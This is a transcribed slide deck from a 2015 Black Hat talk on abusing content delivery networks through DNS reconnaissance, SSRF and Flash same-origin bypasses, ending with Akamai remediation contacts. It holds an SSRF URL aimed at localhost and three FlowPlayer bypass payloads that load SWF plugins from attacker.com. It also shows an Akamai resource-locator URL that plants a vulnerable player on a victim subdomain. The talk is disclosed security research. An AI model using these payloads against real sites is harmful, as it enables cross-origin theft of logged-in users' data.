SlideShare a Scribd company logo

Black hat usa_2015-bypass_surgery-6_aug2015

A
a4202655

This document summarizes vulnerabilities related to content delivery networks (CDNs) and server-side request forgery (SSRF). It discusses how CDNs are used to deliver content for many popular websites, and the security risks if a vulnerability is found in a CDN provider. It also explains how SSRF allows attackers to perform requests from a web server to internal systems and networks. Tools for DNS reconnaissance and exploiting SSRF are presented. The document further explores how Flash can be used to bypass the same-origin policy by loading content from other domains using vulnerabilities in plugins like FlowPlayer.

1 of 114
Download to read offline
Bypass Surgery Abusing Content Delivery Networks With Server Side Request Forgery (SSRF), Flash, and DNS BY MIKE BROOKS AND MATTHEW BRYANT August 6, 2015
22 Security Consultant for Bishop Fox Maintainer of The Hacker Blog: https://thehackerblog.com @IAmMandatory Signal Fingerprint 05 d4 6b db 51 31 9b 43 b6 6b c6 96 91 fb 3c 1e 60 3c 93 6b 4e 1f 55 8e 54 9a 93 e0 a4 c3 ad 99 34 HAS BEEN KNOWN TO HACK THINGS Matthew Bryant (mandatory)
33 STACKOVERFLOW.COM & SECURITY.STACKEXCHANGE.COM rook
44 • Almost all modern web applications depend on third-party services to operate. • These third parties are implicitly trusted and work invisibly in the background. WORKING BUT TANGLED Interconnected Services
55 • The web consists of many content delivery networks (CDNs) that deliver content via large distributed networks. • When you visit your favorite sites, you unknowingly trust these services. ONE PAGE SPAWNING MANY REQUESTS Content Delivery Networks
66 ONE PAGE SPAWNING MANY REQUESTS How People Think the Web Works… foxnews.com homepage?
77 ONE PAGE SPAWNING MANY REQUESTS How People Think the Web Works… Here you go!
88 ONE PAGE SPAWNING MANY REQUESTS How It Actually Works…
99 • Many sites on the Internet trust a short list of CDNs to serve their content. • What happens when a vulnerability is found in a CDN provider? • The impact is severe and far reaching. WHAT COULD GO WRONG Many Sites Trusting a Few CDNs
1010 ATTACK CHAINS What happened? SSRF Remote SWF Include
DNS RECONNAISSANCE DNS HOLDS THE KEYS
1212 Internal External INFRASTRUCTURE A Divided Penetration Testing Scope
1313 TOOLS DNS meta-query spider • https://github.com/TheRook/subbrute Search though a mass-reverse lookup DB • https://dnsdumpster.com/ Brute-force forward-lookups • https://github.com/darkoperator/dnsrecon Profiling With DNS
1414 SubBrute 2.0 Source: https://github.com/TheRook/subbrute • Through (~3 hours) – Authoritative NS used by default ./subbrute.py google.com –p –s names_large • Very Fast (~8 minutes) – Using Open Resolvers ./subbrute.py google.com –p –r resolvers.txt
1515 QUERIES ABOUT QUERIES DNS Meta Queries AXFR - Transfers entire zone file from the master name server to “secondary name servers” ANY - Returns all records of all types known to the name server. If the name server does not have any information on the name, the request will be forwarded on.
1616 DNS META QUERY dig any google.com @8.8.8.8
1717 DNS META QUERY SPIDER ./subbrute.py google.com –p –o goog.csv
1818 Types of Records Found on Google.com Total Records: 3056 Total Subdomains: 358 A, 2379 CNAME, 231 AAAA, 255 MX, 146 NS, 12 SRV, 22 SOA, 3 NOERROR, 7 TYPE257, 1 A CNAME AAAA MX NS SRV SOA NOERROR TYPE257 0 500 1000 1500 2000 2500
1919 DNS RECORD TYPE 257 RFC-6844: DNS Certificate Pinning Source: https://en.wikipedia.org/wiki/DNS_Certification_Authority_Authorization
2020 DNS Record Type 257 http://arstechnica.com/security/2015/04/google-chrome-will-banish-chinese- certificate-authority-for-breach-of-trust/
2121 RFC-6698: DNSSEC PKI Source: https://en.wikipedia.org/wiki/DNS-based_Authentication_of_Named_Entities
2222 VOIP, CALENDAR, AND LDAP SERVICES SRV Record Enumeration • _caldav._tcp.google.com,SRV,5 0 80 calendar.google.com. • _jabber-client._tcp.google.com,SRV,20 0 5222 alt1.xmpp.l.google.com. • _ldap._tcp.google.com,SRV,5 0 389 ldap.google.com. • _xmpp-client._tcp.google.com,SRV,5 0 5222 xmpp.l.google.com._xmpp- • server._tcp.google.com,SRV,5 0 5269 xmpp- server.l.google.com.
2323 SOP BYPASS AT SCALE Akamai EdgeSuite - DNS static.fbcdn.com static.facebook.com.edgesuite.net. a1860.g.akamai.net. 64.145.75.11
2424 VOIP, CALENDAR, AND LDAP SERVICES subbrute - Internal Network Assessment subbrute.exe MicrosoftDomain.com –r internal_resolvers.txt –s names_large.txt ... 19 domain controllers found… _ldap._tcp.dc._msdcs.MicrosoftDomain.com,SRV,0 100 389 rangers.LegitBank.com. _ldap._tcp.dc._msdcs.MicrosoftDomain.com,SRV,0 100 389 sharks.DOMAIN.com. _ldap._tcp.dc._msdcs.MicrosoftDomain.com,SRV,0 100 389 canucks.DOMAIN.com.
2525 A Common DNS Misconfiguration Source: https://cwe.mitre.org/data/definitions/203.html
2626 NOERROR RESPONSES ./subbrute.py LegitBank.com –p –o comp _domainkey.LegitBank.com,NOERROR, sci.LegitBank.com,NOERROR, vcs.LegitBank.com,NOERROR, dev.LegitBank.com,NOERROR, internal.LegitBank.com,NOERROR
2727 INTERNAL ADDRESSES NOERROR? cat comp | grep NOERROR > comp.ne ./subbrute.py –t comp.ne –p –o comp.internal ldap.sci.LegitBank.com,CNAME,prod-ldap-proxy- vip.sci.LegitBank.com. prod-ldap-proxy-vip.sci.LegitBank.com, CNAME,prod- ldap-proxy-vip-sv4.sci.LegitBank.com. prod-ldap-proxy-vip-sv4.sci.LegitBank.com, A,10.30.40.40
2828 CONTINUED NOERROR? ./subbrute.py –t comp.ne –p –o comp.internal … accounting.internal.LegitBank.com, A,10.30.0.41 monitoring.internal.LegitBank.com, A,10.30.0.42
SERVER-SIDE REQUEST FORGERY IT’S A TRUST THING
3030 CROSSING THE ORIGIN BOUNDARY Server Trust LegitBank.com
3131 FIRST TWO HITS ARE SSRF Search for “Cross Domain Proxy”
3232 TOOLS Netcat for the 21st century • https://nmap.org/ncat/ HTTP Request and Response Service • http://httpbin.org/ Burp Collaborator • http://blog.portswigger.net/2015/04/introducing- burp-collaborator.html SSRF tools
3333 Access to the Web Server’s localhost http://legitbank.com/proxy.php?csurl=http://localhost:631
3434 Access to the Web Server’s localhost
3535 Access to Internal Network Hardware
3636 CROSSING THE ORIGIN BOUNDARY Server Trust LegitBank.com www.LegitBank.com accounting.internal.LegitBank.com
3737 TOOLS SSRF In A Load Balancer
3838 PATHS TO EXPLOITATION • Can I access a protected resource? • XXE DTD system to make HTTP Requests? • Internal IP Address or Hosts? • “Virtual Private Cloud,” S3, MongoDB HTTP interface? • Can I connect to a host I control? • Can I load arbitrary content such as a SWF on the domain? SSRF Questions
FLASH REMOTE SWF INCLUDE VULNERABILITIES GONE IN A FLASH
4040 Crossdomain.xml Proof of Concept Tool • https://thehackerblog.com/crossdomain/ FlashHTTPRequest • https://github.com/mandatoryprogrammer/FlashHTTPReque st JPEXS • https://www.free-decompiler.com/flash/ SEARCHDIGGITY • http://www.bishopfox.com/resources/tools/google-hacking- diggity/attack-tools/ MEN HAVE BECOME TOOLS OF THEIR TOOLS Tools
JAVASCRIPT VS FLASH REMOTE INCLUSION CROSSING THE ORIGIN BOUNDARY
4242 • An origin is a combination of port, scheme, and domain. • Origins separate sites from accessing each other’s data due to the Same Origin Policy (SOP). • For example, a script executing in the context of the http://example.com origin could not read data from http://thirdparty.com because the origins do not match. CROSSING THE ORIGIN BOUNDARY What’s an origin?
4343 JavaScript • Remote JavaScript includes execute in the context of the including site’s origin. Flash • Remote includes execute in the context of the hosting site’s origin. CROSSING THE ORIGIN BOUNDARY Differences between JavaScript and Flash
4444 CROSSING THE ORIGIN BOUNDARY Remote JavaScript Inclusion Example http://legitbank.com/ <!DOCTYPE html> <html> <head></head> <body> <h1>Script Origin:<p id="origin"></p></h1> <script src="http://thirdparty.com/example.js"></script> </body> </html>
4545 CROSSING THE ORIGIN BOUNDARY Remote JavaScript Inclusion Example http://thirdparty.com/example.js document.getElementById(‘origin’).innerText = location.origin
4646 CROSSING THE ORIGIN BOUNDARY Remote JavaScript Inclusion
4747 CROSSING THE ORIGIN BOUNDARY Remote Flash Inclusion Example http://legitbank.com/ <!DOCTYPE html> <html> <head></head> <body> <object type=“application/x-shockwave-flash” data=“http://thirdparty.com/example.swf”> </body> </html>
4848 CROSSING THE ORIGIN BOUNDARY Remote Flash Inclusion Example http://thirdparty.com/secrets.txt Secrets on thirdparty.com!
4949 • Before Flash preforms a cross-origin request, the target site’s crossdomain.xml file is checked. • This file permits third-party sites to perform authenticated requests via allow-access-from domain tags. • Wildcard usage is allowed and is commonplace. CROSSING THE ORIGIN BOUNDARY Flash Cross-Domain Policies
5050 CROSSING THE ORIGIN BOUNDARY Example Crossdomain.xml File http://legitbank.com/crossdomain.xml <cross-domain-policy> <allow-access-from domain=“*.legitbank.com”> <allow-access-from domain=“*.thirdparty.com”> </cross-domain-policy>
5151 75% 25% USES DOESN'T USE *NOT INCLUDING SITES WITH JUST A WILDCARD ENTRY Usage of domain wildcards (*.domain.com)? *Taken from a survey of Alexa top 10,000 sites
5252 • Enumerate all subdomains of a domain name: • ./subbrute.py thirdparty.com • ./subbrute.py legitbank.com • An arbitrary SWF upload or vulnerable SWF on any domain will compromise the security of legitbank.com. CROSSING THE ORIGIN BOUNDARY Enumerating Subdomains With Subbrute
FLOWPLAYER DON’T HATE THE PLAYER
5454 • FlowPlayer is a Flash application that plays videos and allows the loading of arbitrary Flash plugins. DON’T HATE THE PLAYER FlowPlayer
5555 • Problematically, FlowPlayer versions below 3.2.16 allowed the loading of plugins from arbitrary domains. • This means an attacker can hijack the functionality of FlowPlayer by loading arbitrary plugins into the player. DON’T HATE THE PLAYER FlowPlayer
5656 DON’T HATE THE PLAYER FlowPlayer http://legitbank.com/ flowplayer("player", vulnerable_player,{ plugins: { controls: null, SimpleHelloWorld: { url: 'http://thirdparty.com/plugin.swf', } } });
5757 • With the release of FlowPlayer 3.2.18 new code was introduced to prevent loading of arbitrary plugins. • This code parses the plugin URL to check if it’s trusted before loading it. • However, we found three bypasses by auditing the plugin checking code. DON’T HATE THE PLAYER Multiple FlowPlayer Bypasses
5858
5959 DON’T HATE THE PLAYER FlowPlayer Bypass #1 – The Check public static function isLocal(url:String):Boolean { trace("localDomain? " + url); if (url.indexOf("http://localhost") == 0) return true; if (url.indexOf("http://localhost:") == 0) return true; if (url.indexOf("file://") == 0) return true; if (url.indexOf("http://127.0.0.1") == 0) return true; if (url.indexOf("http://") == 0) return false; if (url.indexOf("/") == 0) return true; return false; }
6060 DON’T HATE THE PLAYER FlowPlayer Bypass #1 – The Check public static function isLocal(url:String):Boolean { trace("localDomain? " + url); if (url.indexOf("http://localhost") == 0) return true; if (url.indexOf("http://localhost:") == 0) return true; if (url.indexOf("file://") == 0) return true; if (url.indexOf("http://127.0.0.1") == 0) return true; if (url.indexOf("http://") == 0) return false; if (url.indexOf("/") == 0) return true; return false; }
6161 DON’T HATE THE PLAYER FlowPlayer Bypass #1 – The Bypass http://attacker.com/ flowplayer("player", vulnerable_player,{ plugins: { controls: null, SimpleHelloWorld: { url: ’//attacker.com/exploit.swf', } } });
6262 DON’T HATE THE PLAYER FlowPlayer Bypass #2 – The Check public static function getDomain(url:String):String { var schemeEnd:int = getSchemeEnd(url); var domain:String = url.substr(schemeEnd); var endPos:int = getDomainEnd(domain); return domain.substr(0, endPos).toLowerCase(); } internal static function getSchemeEnd(url:String):int { var pos:int = url.indexOf("///"); if (pos >= 0) return pos + 3; pos = url.indexOf("//"); if (pos >= 0) return pos + 2; return 0; }
6363 DON’T HATE THE PLAYER FlowPlayer Bypass #2 – The Check public static function getDomain(url:String):String { var schemeEnd:int = getSchemeEnd(url); var domain:String = url.substr(schemeEnd); var endPos:int = getDomainEnd(domain); return domain.substr(0, endPos).toLowerCase(); } internal static function getSchemeEnd(url:String):int { var pos:int = url.indexOf("///"); if (pos >= 0) return pos + 3; pos = url.indexOf("//"); if (pos >= 0) return pos + 2; return 0; }
6464 DON’T HATE THE PLAYER FlowPlayer Bypass #2 – The Bypass http://attacker.com/ flowplayer("player", vulnerable_player,{ plugins: { controls: null, SimpleHelloWorld: { url: ’http://attacker.com///legitbank.com/../flowplayer/plugin. swf', } } });
6565 DON’T HATE THE PLAYER FlowPlayer Bypass #3 – The Bypass http://attacker.com/ flowplayer("player", vulnerable_player,{ plugins: { controls: null, SimpleHelloWorld: { url: ’http://legitbank.com/openredirect.php?url=http://attacker.com/flowplayer/plu gin.swf', } } });
6666 There are probably many more, but three is a cool number. DON’T HATE THE PLAYER More bypasses…
6767 (Artist interpretation)
6868 CROSSING THE ORIGIN BOUNDARY Flowplayer attacker.com legitbank.com
6969 CROSSING THE ORIGIN BOUNDARY Flowplayer Users logs in to legitbank.com attacker.com legitbank.com
7070 CROSSING THE ORIGIN BOUNDARY Flowplayer attacker.com legitbank.com
7171 CROSSING THE ORIGIN BOUNDARY Flowplayer attacker.com legitbank.com
7272 CROSSING THE ORIGIN BOUNDARY Flowplayer attacker.com legitbank.com
7373 CROSSING THE ORIGIN BOUNDARY Flowplayer ATTACKER HIJACKS SWF WITH PLUGIN attacker.com legitbank.com
7474 CROSSING THE ORIGIN BOUNDARY Flowplayer attacker.com legitbank.com
HACKING WEBSITES WITH AKAMAI EDGESUITE SOP BYPASS AT SCALE
WHAT IS EDGESUITE? SOP BYPASS AT SCALE
7777 • EdgeSuite.net is used in Akamai’s Content Delivery Network (CDN). • Part of the FreeFlow service, Akamai’s legacy content delivery network. • The setup process for FreeFlow involves pointing DNS records to Akamai’s network. • Instead of hitting your site directly the Akamai service acts as a caching and distribution service. SOP BYPASS AT SCALE Akamai EdgeSuite
7878 SOP BYPASS AT SCALE Akamai EdgeSuite - DNS akamai.example.com x.example.com.edgesuite.net. a1337.g.akamai.net. 184.25.56.98
7979 SOP BYPASS AT SCALE Akamai EdgeSuite akamai.example.com example.com
8080 SOP BYPASS AT SCALE Akamai EdgeSuite akamai.example.com example.com
8181 SOP BYPASS AT SCALE Akamai EdgeSuite akamai.example.com example.com
8282 SOP BYPASS AT SCALE Akamai EdgeSuite akamai.example.com example.com
AKAMAI RESOURCE LOCATORS (ARL) SOP BYPASS AT SCALE
8484 • Akamai Resource Locator • Special URL use to host files on the Akamai network. • A deprecated service that Akamai used to do when setting up clients for their CDN solution. • Despite being deprecated, many endpoints still have it enabled. SOP BYPASS AT SCALE ARLv1
8585 Say you want to host this file on Akamai: http://example.edgesuite.net/flow/swf/example. swf SOP BYPASS AT SCALE ARLv1
8686 http://akamai.example.com/f/248/322142/1d/example.edge suite.net/flow/swf/example.swf SOP BYPASS AT SCALE ARLv1 CACHE OPTIONS (TIME TO CACHE, CLIENT ID, ETC.) THE URL TO THE FILE WEBSITE POINTING TO AKAMAI
8787 • This process is known as Akamaization of a URL. • Akamai’s network works by pulling the file off your server and hosting it on the CDN. SOP BYPASS AT SCALE ARLv1
8888 • If you point akamai.example.com to Akamai’s EdgeSuite service, we can host arbitrary files on your server. • However, you can only use the site to retrieve files from a specific list of sites. SOP BYPASS AT SCALE ARLv1 & EdgeSuite
8989 SOP BYPASS AT SCALE ARLv1
9090 • We took to enumerating what sites could be proxied. ./subbrute.py edgesuite.net • After some searching we found a site on the whitelist. SOP BYPASS AT SCALE ARLv1 & EdgeSuite
9191 SOP BYPASS AT SCALE ARLv1 & EdgeSuite
9292 http://mediapm.edgesuite.net/flow/swf/flowplayer-v3.2.16.swf
9393 • Not only do they host FlowPlayer, they host FlowPlayer 3.2.16, which allows the loading of any arbitrary Flash plugins. • So, putting it together - we can now host an intentionally vulnerable version of FlowPlayer on any site mapped to EdgeSuite, and then hijack it. SOP BYPASS AT SCALE ARLv1 & EdgeSuite
9494 http://i.legitbank.com/f/1/1/1/mediapm.edgesuite.net/flow/swf/flowplayer- v3.2.16.swf
9595 (Artist interpretation)
9696 THE FALLOUT Full Exploit Flow User logs in to legitbank.com legitbank.com
9797 THE FALLOUT Full Exploit Flow attacker.com legitbank.com
9898 THE FALLOUT Full Exploit Flow akamai.legitbank.com mediapm.edgesuite.net attacker.com legitbank.com
9999 mediapm.edgesuite.net THE FALLOUT Full Exploit Flow ATTACKER LOADS MALICIOUS PLUGIN INTO FLOWPLAYER attacker.com legitbank.com akamai.legitbank.com
100100 THE FALLOUT Full Exploit Flow HIJACKED FLOWPLAYER REQUESTS PAGE FROM LEGITBANK.COM DUE TO A *.LEGITBANK.COM ENTRY IN CROSSDOMAIN.XML THIS IS ALLOWED. mediapm.edgesuite.net akamai.legitbank.com attacker.com legitbank.com
REVISITING FLASH CROSS-DOMAIN POLICIES SOP BYPASS AT SCALE
102102 CROSSING THE ORIGIN BOUNDARY Example Crossdomain.xml File http://legitbank.com/crossdomain.xml <cross-domain-policy> <allow-access-from domain=“*.legitbank.com”> <allow-access-from domain=“*.thirdparty.com”> </cross-domain-policy>
103103 CROSSING THE ORIGIN BOUNDARY Example Crossdomain.xml File http://legitbank.com/crossdomain.xml <cross-domain-policy> <allow-access-from domain=“*.legitbank.com”> <allow-access-from domain=“*.thirdparty.com”> </cross-domain-policy> IF ANY SUBDOMAIN IS MAPPED TO EDGESUITE THE SITE IS COMPROMISED IF ANY SUBDOMAIN IS MAPPED TO EDGESUITE THE SITE IS COMPROMISED
104104 • A site doesn’t even have to use Akamai EdgeSuite to be vulnerable. • They just have to trust them via crossdomain.xml. • Due to Flash’s crossdomain.xml policies being so commonly misconfigured, we can increase our impact to affect many more sites. SOP BYPASS AT SCALE Expanding Attack Surface With Flash
THE FALLOUT WHO USES A CDN ANYWAYS?
VERIZON WIRELESS MY OTHER NUMBER IS YOUR NUMBER
NOSCRIPT A WHITELIST IS MORE A LIST OF POSSIBILITIES
108108 • HTTP Content Security Policy (CSP) will not prevent this type of attack. • Since we are loading their SWF into our own page, the CSP does not apply. • Additionally, we can use vulnerable SWFs hosted on Content Delivery Networks (CDNs) to exploit site’s with CDNs in their CSP whitelists. CROSSING THE ORIGIN BOUNDARY Bypassing HTTP Content Security Policy
109109 • Akamai has been super supportive to us throughout this disclosure process. • In order to address this vulnerability, they have provided us with instructions on remediation if you are vulnerable. HOW DO I FIX THIS? Remediation
110110 • You may already be patched! • If you are an Akamai customer you need to call Akamai’s support line at 1-617-444-4699 or email them at ccare@akamai.com. • Public inquires can be directed to Rob Morton at 1-617-444-3641 or rmorton@akamai.com. HOW DO I FIX THIS? How Do I Remediate?
111111 • If you are a security researcher with a vulnerability in Akamai you can reach them at security@akamai.com. • They have a PGP key available on their website that you can use for more sensitive communications. • Akamai is hiring folks at: https://www.akamai.com/us/en/about/careers/ind ex.jsp. HOW DO I FIX THIS? Future Security Research
@BISHOPFOX FACEBOOK.COM/BISHOPFOXCONSULTING LINKEDIN.COM/COMPANY/BISHOP-FOX GOOGLE.COM/+BISHOPFOX Contact Us
Thank you
We’re Hiring www.bishopfox.com contact@bishopfox.com

Recommended

Php Tutorials for Beginners
Php Tutorials for BeginnersPhp Tutorials for Beginners
Php Tutorials for Beginners
Vineet Kumar Saini
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
bugcrowd
 
Function pada PHP
Function pada PHPFunction pada PHP
Function pada PHPMateri Kuliah Online
 
JavaScript Basics
JavaScript BasicsJavaScript Basics
JavaScript Basics
Bhanuka Uyanage
 
Regular Expressions in PHP
Regular Expressions in PHPRegular Expressions in PHP
Regular Expressions in PHP
Andrew Kandels
 
Introduction to es6
Introduction to es6Introduction to es6
Introduction to es6
NexThoughts Technologies
 
Javascript
JavascriptJavascript
Javascript
guest03a6e6
 
Exception handling and templates
Exception handling and templatesException handling and templates
Exception handling and templatesfarhan amjad
 

Recommended

Php Tutorials for Beginners
Php Tutorials for BeginnersPhp Tutorials for Beginners
Php Tutorials for Beginners
Vineet Kumar Saini
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
bugcrowd
 
Function pada PHP
Function pada PHPFunction pada PHP
Function pada PHPMateri Kuliah Online
 
JavaScript Basics
JavaScript BasicsJavaScript Basics
JavaScript Basics
Bhanuka Uyanage
 
Regular Expressions in PHP
Regular Expressions in PHPRegular Expressions in PHP
Regular Expressions in PHP
Andrew Kandels
 
Introduction to es6
Introduction to es6Introduction to es6
Introduction to es6
NexThoughts Technologies
 
Javascript
JavascriptJavascript
Javascript
guest03a6e6
 
Exception handling and templates
Exception handling and templatesException handling and templates
Exception handling and templatesfarhan amjad
 
Javascript functions
Javascript functionsJavascript functions
Javascript functions
Alaref Abushaala
 
Pre processor directives in c
Pre processor directives in cPre processor directives in c
Pre processor directives in cbaabtra.com - No. 1 supplier of quality freshers
 
Java script basics
Java script basicsJava script basics
Java script basics
Shrivardhan Limbkar
 
Java script errors &amp; exceptions handling
Java script errors &amp; exceptions handlingJava script errors &amp; exceptions handling
Java script errors &amp; exceptions handling
AbhishekMondal42
 
An Introduction to the DOM
An Introduction to the DOMAn Introduction to the DOM
An Introduction to the DOM
Mindy McAdams
 
Java script
Java scriptJava script
Java script
Jay Patel
 
Introduction to Perl - Day 1
Introduction to Perl - Day 1Introduction to Perl - Day 1
Introduction to Perl - Day 1
Dave Cross
 
The JavaScript Programming Language
The JavaScript Programming LanguageThe JavaScript Programming Language
The JavaScript Programming Language
guestceb98b
 
Advanced Javascript
Advanced JavascriptAdvanced Javascript
Advanced JavascriptAdieu
 
PHP で実行中のスクリプトの動作を下から覗き見る
PHP で実行中のスクリプトの動作を下から覗き見るPHP で実行中のスクリプトの動作を下から覗き見る
PHP で実行中のスクリプトの動作を下から覗き見る
shinjiigarashi
 
javaScript.ppt
javaScript.pptjavaScript.ppt
javaScript.ppt
sentayehu
 
Php Error Handling
Php Error HandlingPhp Error Handling
Php Error Handlingmussawir20
 
Grails object relational mapping: GORM
Grails object relational mapping: GORMGrails object relational mapping: GORM
Grails object relational mapping: GORM
Saurabh Dixit
 
Introduction to Rust language programming
Introduction to Rust language programmingIntroduction to Rust language programming
Introduction to Rust language programming
Rodolfo Finochietti
 
Asynchronous JavaScript Programming with Callbacks & Promises
Asynchronous JavaScript Programming with Callbacks & PromisesAsynchronous JavaScript Programming with Callbacks & Promises
Asynchronous JavaScript Programming with Callbacks & Promises
Hùng Nguyễn Huy
 
Php and MySQL
Php and MySQLPhp and MySQL
Php and MySQL
Tiji Thomas
 
Exp_3_20BCA1311 Linux Labbyharshdeep.docx
Exp_3_20BCA1311 Linux Labbyharshdeep.docxExp_3_20BCA1311 Linux Labbyharshdeep.docx
Exp_3_20BCA1311 Linux Labbyharshdeep.docx
ApkaAmitbro
 
JavaScript - Chapter 11 - Events
JavaScript - Chapter 11 - Events JavaScript - Chapter 11 - Events
JavaScript - Chapter 11 - Events
WebStackAcademy
 
Class 3 - PHP Functions
Class 3 - PHP FunctionsClass 3 - PHP Functions
Class 3 - PHP Functions
Ahmed Swilam
 
Unit ii chapter 2 Decision making and Branching in C
Unit ii chapter 2 Decision making and Branching in CUnit ii chapter 2 Decision making and Branching in C
Unit ii chapter 2 Decision making and Branching in C
Sowmya Jyothi
 
Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud Hack
NotSoSecure Global Services
 
Burp suite
Burp suiteBurp suite
Burp suite
Yashar Shahinzadeh
 

More Related Content

What's hot

Javascript functions
Javascript functionsJavascript functions
Javascript functions
Alaref Abushaala
 
Java script basics
Java script basicsJava script basics
Java script basics
Shrivardhan Limbkar
 
Java script errors &amp; exceptions handling
Java script errors &amp; exceptions handlingJava script errors &amp; exceptions handling
Java script errors &amp; exceptions handling
AbhishekMondal42
 
An Introduction to the DOM
An Introduction to the DOMAn Introduction to the DOM
An Introduction to the DOM
Mindy McAdams
 
Java script
Java scriptJava script
Java script
Jay Patel
 
Introduction to Perl - Day 1
Introduction to Perl - Day 1Introduction to Perl - Day 1
Introduction to Perl - Day 1
Dave Cross
 
The JavaScript Programming Language
The JavaScript Programming LanguageThe JavaScript Programming Language
The JavaScript Programming Language
guestceb98b
 
Advanced Javascript
Advanced JavascriptAdvanced Javascript
Advanced JavascriptAdieu
 
PHP で実行中のスクリプトの動作を下から覗き見る
PHP で実行中のスクリプトの動作を下から覗き見るPHP で実行中のスクリプトの動作を下から覗き見る
PHP で実行中のスクリプトの動作を下から覗き見る
shinjiigarashi
 
javaScript.ppt
javaScript.pptjavaScript.ppt
javaScript.ppt
sentayehu
 
Php Error Handling
Php Error HandlingPhp Error Handling
Php Error Handlingmussawir20
 
Grails object relational mapping: GORM
Grails object relational mapping: GORMGrails object relational mapping: GORM
Grails object relational mapping: GORM
Saurabh Dixit
 
Introduction to Rust language programming
Introduction to Rust language programmingIntroduction to Rust language programming
Introduction to Rust language programming
Rodolfo Finochietti
 
Asynchronous JavaScript Programming with Callbacks & Promises
Asynchronous JavaScript Programming with Callbacks & PromisesAsynchronous JavaScript Programming with Callbacks & Promises
Asynchronous JavaScript Programming with Callbacks & Promises
Hùng Nguyễn Huy
 
Php and MySQL
Php and MySQLPhp and MySQL
Php and MySQL
Tiji Thomas
 
Exp_3_20BCA1311 Linux Labbyharshdeep.docx
Exp_3_20BCA1311 Linux Labbyharshdeep.docxExp_3_20BCA1311 Linux Labbyharshdeep.docx
Exp_3_20BCA1311 Linux Labbyharshdeep.docx
ApkaAmitbro
 
JavaScript - Chapter 11 - Events
JavaScript - Chapter 11 - Events JavaScript - Chapter 11 - Events
JavaScript - Chapter 11 - Events
WebStackAcademy
 
Class 3 - PHP Functions
Class 3 - PHP FunctionsClass 3 - PHP Functions
Class 3 - PHP Functions
Ahmed Swilam
 
Unit ii chapter 2 Decision making and Branching in C
Unit ii chapter 2 Decision making and Branching in CUnit ii chapter 2 Decision making and Branching in C
Unit ii chapter 2 Decision making and Branching in C
Sowmya Jyothi
 

What's hot (20)

Javascript functions
Javascript functionsJavascript functions
Javascript functions
 
Pre processor directives in c
Pre processor directives in cPre processor directives in c
Pre processor directives in c
 
Java script basics
Java script basicsJava script basics
Java script basics
 
Java script errors &amp; exceptions handling
Java script errors &amp; exceptions handlingJava script errors &amp; exceptions handling
Java script errors &amp; exceptions handling
 
An Introduction to the DOM
An Introduction to the DOMAn Introduction to the DOM
An Introduction to the DOM
 
Java script
Java scriptJava script
Java script
 
Introduction to Perl - Day 1
Introduction to Perl - Day 1Introduction to Perl - Day 1
Introduction to Perl - Day 1
 
The JavaScript Programming Language
The JavaScript Programming LanguageThe JavaScript Programming Language
The JavaScript Programming Language
 
Advanced Javascript
Advanced JavascriptAdvanced Javascript
Advanced Javascript
 
PHP で実行中のスクリプトの動作を下から覗き見る
PHP で実行中のスクリプトの動作を下から覗き見るPHP で実行中のスクリプトの動作を下から覗き見る
PHP で実行中のスクリプトの動作を下から覗き見る
 
javaScript.ppt
javaScript.pptjavaScript.ppt
javaScript.ppt
 
Php Error Handling
Php Error HandlingPhp Error Handling
Php Error Handling
 
Grails object relational mapping: GORM
Grails object relational mapping: GORMGrails object relational mapping: GORM
Grails object relational mapping: GORM
 
Introduction to Rust language programming
Introduction to Rust language programmingIntroduction to Rust language programming
Introduction to Rust language programming
 
Asynchronous JavaScript Programming with Callbacks & Promises
Asynchronous JavaScript Programming with Callbacks & PromisesAsynchronous JavaScript Programming with Callbacks & Promises
Asynchronous JavaScript Programming with Callbacks & Promises
 
Php and MySQL
Php and MySQLPhp and MySQL
Php and MySQL
 
Exp_3_20BCA1311 Linux Labbyharshdeep.docx
Exp_3_20BCA1311 Linux Labbyharshdeep.docxExp_3_20BCA1311 Linux Labbyharshdeep.docx
Exp_3_20BCA1311 Linux Labbyharshdeep.docx
 
JavaScript - Chapter 11 - Events
JavaScript - Chapter 11 - Events JavaScript - Chapter 11 - Events
JavaScript - Chapter 11 - Events
 
Class 3 - PHP Functions
Class 3 - PHP FunctionsClass 3 - PHP Functions
Class 3 - PHP Functions
 
Unit ii chapter 2 Decision making and Branching in C
Unit ii chapter 2 Decision making and Branching in CUnit ii chapter 2 Decision making and Branching in C
Unit ii chapter 2 Decision making and Branching in C
 

Similar to Black hat usa_2015-bypass_surgery-6_aug2015

Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud Hack
NotSoSecure Global Services
 
Burp suite
Burp suiteBurp suite
Burp suite
Yashar Shahinzadeh
 
Deep Dive on Accelerating Content, APIs, and Applications with Amazon CloudFr...
Deep Dive on Accelerating Content, APIs, and Applications with Amazon CloudFr...Deep Dive on Accelerating Content, APIs, and Applications with Amazon CloudFr...
Deep Dive on Accelerating Content, APIs, and Applications with Amazon CloudFr...
Amazon Web Services
 
Cloudflare and Drupal - fighting bots and traffic peaks
Cloudflare and Drupal - fighting bots and traffic peaksCloudflare and Drupal - fighting bots and traffic peaks
Cloudflare and Drupal - fighting bots and traffic peaks
Łukasz Klimek
 
DNS – Strategies for Reducing Data Leakage & Protecting Online Privacy – Hack...
DNS – Strategies for Reducing Data Leakage & Protecting Online Privacy – Hack...DNS – Strategies for Reducing Data Leakage & Protecting Online Privacy – Hack...
DNS – Strategies for Reducing Data Leakage & Protecting Online Privacy – Hack...
EC-Council
 
ICANN 51: Name Collision
ICANN 51: Name CollisionICANN 51: Name Collision
ICANN 51: Name Collision
ICANN
 
Flashack
FlashackFlashack
Flashack
n|u - The Open Security Community
 
QA: Базовое тестирование защищенности веб-приложений в рамках QA
QA: Базовое тестирование защищенности веб-приложений в рамках QAQA: Базовое тестирование защищенности веб-приложений в рамках QA
QA: Базовое тестирование защищенности веб-приложений в рамках QA
CodeFest
 
Codefest2015
